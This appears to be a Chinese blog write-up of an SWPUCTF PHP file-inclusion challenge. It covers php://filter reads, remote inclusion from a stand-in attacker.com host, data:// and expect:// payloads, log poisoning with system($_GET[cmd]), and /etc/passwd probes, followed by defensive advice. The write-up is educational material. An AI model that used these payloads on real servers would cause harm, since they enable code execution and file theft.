当前位置: 首页 > article >正文

从一道SWPUCTF题复盘PHP文件包含漏洞:allow_url_include开启后,除了伪协议还能怎么玩?

从SWPUCTF赛题探索PHP文件包含漏洞的深层攻防在CTF竞赛和实际渗透测试中PHP文件包含漏洞一直是Web安全领域的重要课题。这道来自SWPUCTF新生赛的题目看似简单却蕴含了丰富的攻防对抗思路。当allow_url_include配置被开启时攻击面会显著扩大远不止于常见的伪协议利用。1. 漏洞环境与基础利用分析题目给出的PHP脚本虽然简短但包含了几个关键安全配置?php ini_set(allow_url_include,on); header(Content-type: text/html; charsetutf-8); error_reporting(0); $file$_GET[file]; if(isset($file)){ show_source(__FILE__); echo flag 在flag.php中; }else{ echo 传入一个file试试; } include_once($file);这段代码中最危险的操作是直接使用include_once($file)且未对$file参数做任何过滤。更关键的是开发者通过ini_set临时开启了allow_url_include选项这为多种攻击方式打开了大门。1.1 基础伪协议利用最常见的解法是使用php://filter伪协议读取文件内容http://target.com/?filephp://filter/readconvert.base64-encode/resourceflag.php这种方式的原理是php://filter允许对数据流进行过滤处理convert.base64-encode将文件内容转换为Base64格式由于编码后的内容不是有效PHP代码因此不会被执行攻击者只需解码Base64即可获取原始文件内容典型过滤器组合过滤器类型作用示例convert.base64-encodeBase64编码readconvert.base64-encode/resourceflag.phpstring.rot13ROT13编码readstring.rot13/resourceflag.phpzlib.deflate压缩数据readzlib.deflate/resourceflag.php2. allow_url_include开启后的攻击面扩展当allow_url_includeOn时PHP允许包含远程文件这极大扩展了攻击可能性。以下是几种进阶利用方式2.1 远程文件包含(RFI)攻击者可以托管恶意PHP脚本然后通过URL包含执行http://target.com/?filehttp://attacker.com/shell.txt注意现代PHP默认配置会阻止包含带有HTTP/FTP协议的远程文件除非同时满足以下条件allow_url_fopenOnallow_url_includeOn远程服务器返回的文件扩展名在特定条件下可被解析为PHP2.2 data://协议利用data协议允许直接在URL中包含数据http://target.com/?filedata://text/plain,?php phpinfo();?或者使用Base64编码方式http://target.com/?filedata://text/plain;base64,PD9waHAgcGhwaW5mbygpOz82.3 expect://协议利用在特定环境下expect协议可以执行系统命令http://target.com/?fileexpect://ls不过这种利用方式需要满足PHP安装了expect扩展通常在生产环境中不常见3. 防御策略与安全编码实践针对文件包含漏洞开发者应采取多层次防御措施3.1 输入验证与过滤// 白名单方式验证包含文件 $allowed [header.php, footer.php]; $file $_GET[file]; if(in_array($file, $allowed)) { include($file); } else { die(Invalid file request); }3.2 安全配置建议在php.ini中设置allow_url_includeOff allow_url_fopenOff使用open_basedir限制文件访问范围保持PHP版本更新修复已知漏洞3.3 日志监控与异常检测建议监控以下异常行为包含操作中使用异常协议(php://, data://等)包含操作中尝试访问系统敏感文件(/etc/passwd等)短时间内大量包含操作尝试4. 实战中的高级利用技巧在真实渗透测试中文件包含漏洞往往需要结合其他技术实现更深层次的入侵。4.1 日志文件注入如果服务器权限配置不当可以通过包含日志文件(如access.log)实现代码执行发送包含PHP代码的请求GET /?php system($_GET[cmd]);? HTTP/1.1然后包含日志文件http://target.com/?file/var/log/apache2/access.log4.2 会话文件包含PHP会话文件(/tmp/sess_[id])有时包含用户可控数据可尝试注入http://target.com/?file/tmp/sess_abc1234.3 环境变量利用某些特殊环境变量可能包含用户可控数据http://target.com/?file/proc/self/environ5. 自动化检测与工具使用安全研究人员可以使用以下工具辅助检测文件包含漏洞常用工具对比工具名称类型特点Burp Suite商业强大的手动测试工具支持自定义扫描Wfuzz开源支持参数模糊测试可自定义字典LFI Suite开源专门针对LFI漏洞的测试工具典型测试Payload../../../../etc/passwd php://filter/convert.base64-encode/resourceindex.php data://text/plain,?php phpinfo();?在实际测试中建议先使用无害的包含测试(如包含自身)确认漏洞存在后再尝试敏感操作。

相关文章:

从一道SWPUCTF题复盘PHP文件包含漏洞:allow_url_include开启后,除了伪协议还能怎么玩?

从SWPUCTF赛题探索PHP文件包含漏洞的深层攻防 在CTF竞赛和实际渗透测试中,PHP文件包含漏洞一直是Web安全领域的重要课题。这道来自SWPUCTF新生赛的题目看似简单,却蕴含了丰富的攻防对抗思路。当allow_url_include配置被开启时,攻击面会显著扩…...

如何3分钟上手B站视频下载神器:BilibiliDown跨平台下载完全指南

如何3分钟上手B站视频下载神器:BilibiliDown跨平台下载完全指南 【免费下载链接】BilibiliDown (GUI-多平台支持) B站 哔哩哔哩 视频下载器。支持稍后再看、收藏夹、UP主视频批量下载|Bilibili Video Downloader 😳 项目地址: https://gitcode.com/gh_…...

3步搞定老iPhone降级:LeetDown让你的iPhone 5s/6焕发新生

3步搞定老iPhone降级:LeetDown让你的iPhone 5s/6焕发新生 【免费下载链接】LeetDown a macOS app that downgrades A6 and A7 iDevices to OTA signed firmwares 项目地址: https://gitcode.com/gh_mirrors/le/LeetDown 还在为iPhone 5s或iPhone 6升级后卡顿…...

小型团队如何利用Taotoken统一管理多模型API成本

🚀 告别海外账号与网络限制!稳定直连全球优质大模型,限时半价接入中。 👉 点击领取海量免费额度 小型团队如何利用Taotoken统一管理多模型API成本 对于小型创业团队或项目组而言,同时接入多个大模型服务以获取不同能力…...

别再乱用电容了!从稳压芯片电路入手,搞懂电解电容和贴片电容到底该怎么搭配

电解电容与贴片电容的黄金组合:稳压电路设计实战解析 在电子电路设计中,稳压芯片的输入输出端常见一大一小两个电容并联的经典配置,这种设计看似简单却蕴含着深刻的电路原理。对于刚入行的硬件工程师或电子爱好者来说,理解这种组…...

别再乱设边界了!HFSS中辐射边界(Radiation)与理想匹配层(PML)的实战对比与设置要点

HFSS仿真中的边界条件艺术:Radiation与PML的深度解析与实战选择 在电磁场仿真领域,边界条件的设置往往决定了模拟结果的准确性与计算效率。对于天线设计、雷达散射截面(RCS)分析等开放空间电磁问题,工程师们常常面临一个关键选择:…...

Windows微信QQ防撤回终极指南:一键阻止消息被撤回的完整教程

Windows微信QQ防撤回终极指南:一键阻止消息被撤回的完整教程 【免费下载链接】RevokeMsgPatcher :trollface: A hex editor for WeChat/QQ/TIM - PC版微信/QQ/TIM防撤回补丁(我已经看到了,撤回也没用了) 项目地址: https://gitc…...

ENSP实验避坑指南:搭建园区网时,VLAN间通信、MSTP负载分担、VRRP主备切换这些细节你配对了吗?

ENSP园区网实战排错手册:从VLAN间通信到VRRP主备切换的深度解析 刚完成ENSP园区网搭建实验的网络工程师小王盯着屏幕,眉头紧锁——所有配置明明都按照教程一步步操作,可VLAN间的PC就是无法互通,MSTP负载分担也没生效。这种"…...

告别搜索不到设备!保姆级教程:在Windows上配置QT+MSVC开发BLE应用

Windows平台QTMSVC开发BLE应用全攻略:从环境配置到实战避坑 第一次在Windows上用QT开发BLE应用时,我花了整整三天时间才让程序识别到蓝牙设备。明明代码照着官方文档一字不差,设备指示灯也在闪烁,但程序就是找不到任何设备——这…...

C++ std::function:类型擦除与万能函数包装器实战指南

1. 项目概述:为什么我们需要 std::function 在C的世界里,函数指针曾经是回调、事件处理和策略模式等场景的绝对主力。但用过的人都知道,那玩意儿用起来有多别扭:类型声明复杂,对非静态成员函数、lambda表达式、函数对…...

从任务栏消失到界面混乱:如何用ExplorerPatcher拯救你的Windows 11体验

从任务栏消失到界面混乱:如何用ExplorerPatcher拯救你的Windows 11体验 【免费下载链接】ExplorerPatcher This project aims to enhance the working environment on Windows 项目地址: https://gitcode.com/GitHub_Trending/ex/ExplorerPatcher 你是否经历…...

极验三代w参数生成原理与逆向解析

1. 这不是“破解”,而是对前端验证机制的深度解构 你打开一个电商下单页,点击提交,页面卡住半秒,弹出一个滑块——背景是扭曲的汉字、旋转的数字、重叠的图标。你拖动滑块,系统“滴”一声放行。整个过程不到三秒&#…...

Unity中PNG贴图内存暴增真相:ASTC压缩原理与工业级落地

1. 为什么一张PNG贴图在Unity里会“胖”三倍,而ASTC却能把它按进手机内存里? 你有没有遇到过这样的情况:美术同事发来一张20482048的PNG贴图,文件大小才3.2MB,可一拖进Unity编辑器,Inspector里赫然显示“Te…...

Anthropic Zero Layer:大模型推理栈的原子化归一

1. 项目概述:这不是一次普通更新,而是一次架构级“蒸发” “Anthropic Just Shipped the Layer That’s Already Going to Zero”——这个标题乍看像科技媒体的夸张头条,但作为连续跟踪Claude模型演进三年、亲手部署过从Haiku到Sonnet再到Opu…...

Qt Widgets实战:用QCheckBox三态复选框搞定复杂表单选项(附QButtonGroup管理技巧)

Qt Widgets实战:用QCheckBox三态复选框搞定复杂表单选项(附QButtonGroup管理技巧) 在开发配置型软件界面时,表单中的复选框组往往需要处理比"全选/全不选"更复杂的业务逻辑。想象一个邮件客户端的通知设置面板&#xff…...

从手机拍照到视频播放:一文看懂YUV(NV12/YUV444)格式为什么无处不在

从手机拍照到视频播放:YUV格式的技术演进与行业实践 当你用手机拍摄一张照片或录制一段视频时,图像数据在传感器采集后经历了一系列复杂的格式转换过程。这些转换不仅关乎图像质量,更直接影响着存储空间、处理速度和传输效率。在众多色彩编码…...

OpCore Simplify:黑苹果OpenCore EFI自动化配置的智能解决方案

OpCore Simplify:黑苹果OpenCore EFI自动化配置的智能解决方案 【免费下载链接】OpCore-Simplify A tool designed to simplify the creation of OpenCore EFI 项目地址: https://gitcode.com/GitHub_Trending/op/OpCore-Simplify 在复杂的黑苹果安装过程中&…...

DownKyi完整教程:如何快速下载B站8K超高清视频的终极指南

DownKyi完整教程:如何快速下载B站8K超高清视频的终极指南 【免费下载链接】downkyi 哔哩下载姬downkyi,哔哩哔哩网站视频下载工具,支持批量下载,支持8K、HDR、杜比视界,提供工具箱(音视频提取、去水印等&am…...

基于YOLOv10的低延迟AI瞄准系统:多平台硬件加速与实时检测架构设计

基于YOLOv10的低延迟AI瞄准系统:多平台硬件加速与实时检测架构设计 【免费下载链接】yolov8_aimbot Aim-bot based on AI for all FPS games 项目地址: https://gitcode.com/gh_mirrors/yo/yolov8_aimbot Sunone Aimbot是一个基于YOLOv10深度学习模型的FPS游…...

VideoDownloadHelper专业视频下载解决方案:技术架构与实战指南

VideoDownloadHelper专业视频下载解决方案:技术架构与实战指南 【免费下载链接】VideoDownloadHelper Chrome Extension to Help Download Video for Some Video Sites. 项目地址: https://gitcode.com/gh_mirrors/vi/VideoDownloadHelper VideoDownloadHelp…...

PaperXie 期刊论文写作全解析|从选题到成稿,一键适配普通 / 核心 / SCI 期刊

paperxie-免费查重复率aigc检测/开题报告/毕业论文/智能排版/文献综述/期刊论文https://www.paperxie.cn/ai/journalArticleshttps://www.paperxie.cn/ai/journalArticles 一、前言:期刊论文写作的痛点,你中了几个? 在学术圈,期刊…...

TPT线下工作坊:AIGC、云原生与数据合规的深度实践与碰撞

1. 活动缘起与核心价值:为什么一场线下工作坊如此重要?在数字营销和内容创作领域,我们每天都被海量的线上信息包围。线上会议、直播、社群讨论,这些形式高效且便捷,但总感觉隔着一层屏幕,少了些温度与深度。…...

学术创作提质增效:借助 paperxie 智能撰写工具搞定各层级期刊论文

paperxie-免费查重复率aigc检测/开题报告/毕业论文/智能排版/文献综述/期刊论文https://www.paperxie.cn/ai/journalArticleshttps://www.paperxie.cn/ai/journalArticles 开篇概述 学术论文投稿发表,是学业深造、科研成果落地的关键环节。日常创作过程里&#xff…...

终极Python SECS/GEM协议实现:5分钟构建半导体设备通信系统

终极Python SECS/GEM协议实现:5分钟构建半导体设备通信系统 【免费下载链接】secsgem Simple Python SECS/GEM implementation 项目地址: https://gitcode.com/gh_mirrors/se/secsgem secsgem是一个专为半导体制造行业设计的Python SECS/GEM协议实现库&#…...

用正点原子Nano开发板,5分钟搞定RT-Thread Nano的MDK5工程配置(附串口调试技巧)

正点原子Nano开发板极速上手RT-Thread实战指南 1. 开箱即用的开发环境搭建 刚拿到正点原子Nano开发板时,最令人兴奋的莫过于快速验证硬件是否正常工作。这款基于STM32F103RBT6的开发板,以其72MHz主频和丰富的外设资源,成为嵌入式入门学习的…...

从Hugging Face模型到可部署服务:我的fast-whisper中文识别项目踩坑与优化实录

从Hugging Face模型到可部署服务:我的fast-whisper中文识别项目踩坑与优化实录 去年夏天接手了一个智能客服系统的语音模块改造项目,客户要求实现高准确率的中文语音实时转写。当我第一次在会议室演示原型时,背景杂音导致转写结果出现了&quo…...

TinyRS-R1:轻量级遥感视觉语言模型的技术解析与应用

1. TinyRS-R1:轻量级遥感视觉语言模型的技术解析 在遥感图像分析领域,视觉语言模型(Vision-Language Models, VLMs)正逐渐成为关键技术。这类模型能够同时理解图像内容和自然语言描述,为卫星和航拍图像的分析提供了全新…...

终极指南:在Windows上完美使用苹果触控板的完整配置方案

终极指南:在Windows上完美使用苹果触控板的完整配置方案 【免费下载链接】mac-precision-touchpad Windows Precision Touchpad Driver Implementation for Apple MacBook / Magic Trackpad 项目地址: https://gitcode.com/gh_mirrors/ma/mac-precision-touchpad …...

基于AM62x核心板的微电网智能化改造:异构多核驱动与边缘计算实践

1. 项目概述:当嵌入式核心板遇上微电网最近在做一个挺有意思的项目,客户想把他们园区里那套老旧的微电网系统给“智能化”一下。原来的系统,说白了就是一堆继电器、PLC和工控机攒起来的,数据采集靠串口,控制逻辑写在梯…...

Desktop Postflop v0.2.7:高性能德州扑克GTO求解器架构设计与实现原理深度解析

Desktop Postflop v0.2.7:高性能德州扑克GTO求解器架构设计与实现原理深度解析 【免费下载链接】desktop-postflop [Development suspended] Advanced open-source Texas Holdem GTO solver with optimized performance 项目地址: https://gitcode.com/gh_mirrors…...